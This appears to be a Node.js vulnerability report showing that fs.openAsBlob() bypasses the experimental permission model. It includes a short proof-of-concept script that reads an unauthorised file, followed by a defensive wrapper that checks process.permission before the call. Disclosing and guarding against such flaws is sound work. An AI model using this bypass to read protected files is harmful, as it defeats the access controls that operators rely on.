Summary: fs.openAsBlob() does not appear to be limited by the permission system.
Description: Starting Node with --experimental-permission does not appear to restrict fs.openAsBlob().
Run the following code with --experimental-permission and do not grant it read access to file.txt:
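    'use strict';
    const fs = require('node:fs');

    async function main() {
      // file.txt sits next to this script; no read access was granted for it.
      const blob = await fs.openAsBlob(__dirname + '/file.txt');
      // If the permission system applied, this line would never print the contents.
      console.log(await blob.text());
    }

    main();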
The permission system is bypassed when it should not be.
None
An attacker can read files they should not be able to.
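
A defensive guard for code that must run on an affected build, added here as an example and not taken from the report or from Node.js itself: it asks the permission model about the path before calling fs.openAsBlob(). The names assertReadAllowed, guardedOpenAsBlob and fakePermission are hypothetical; process.permission.has() is the existing runtime query API.

```javascript
'use strict';
const fs = require('node:fs');
const path = require('node:path');

// Hypothetical helper (not a Node.js API): ask the permission model whether
// fs.read is granted for `file` before any read API is called.
// `permission` defaults to process.permission, which is only defined when
// Node runs with the permission model enabled; it is injectable for testing.
function assertReadAllowed(file, permission = process.permission) {
  const resolved = path.resolve(file);
  if (permission && !permission.has('fs.read', resolved)) {
    const err = new Error(`Access to fs.read denied for ${resolved}`);
    err.code = 'ERR_ACCESS_DENIED';
    throw err;
  }
  return resolved;
}

// Hypothetical wrapper: same result as fs.openAsBlob(), but rejects first
// when the permission model does not grant read access to the path.
async function guardedOpenAsBlob(file, options, permission = process.permission) {
  return fs.openAsBlob(assertReadAllowed(file, permission), options);
}

// Constructed stand-in for process.permission, used to exercise the guard
// without starting Node with --experimental-permission.
function fakePermission(allowedFiles) {
  const allowed = new Set(allowedFiles.map((f) => path.resolve(f)));
  return { has: (scope, ref) => scope === 'fs.read' && allowed.has(ref) };
}
```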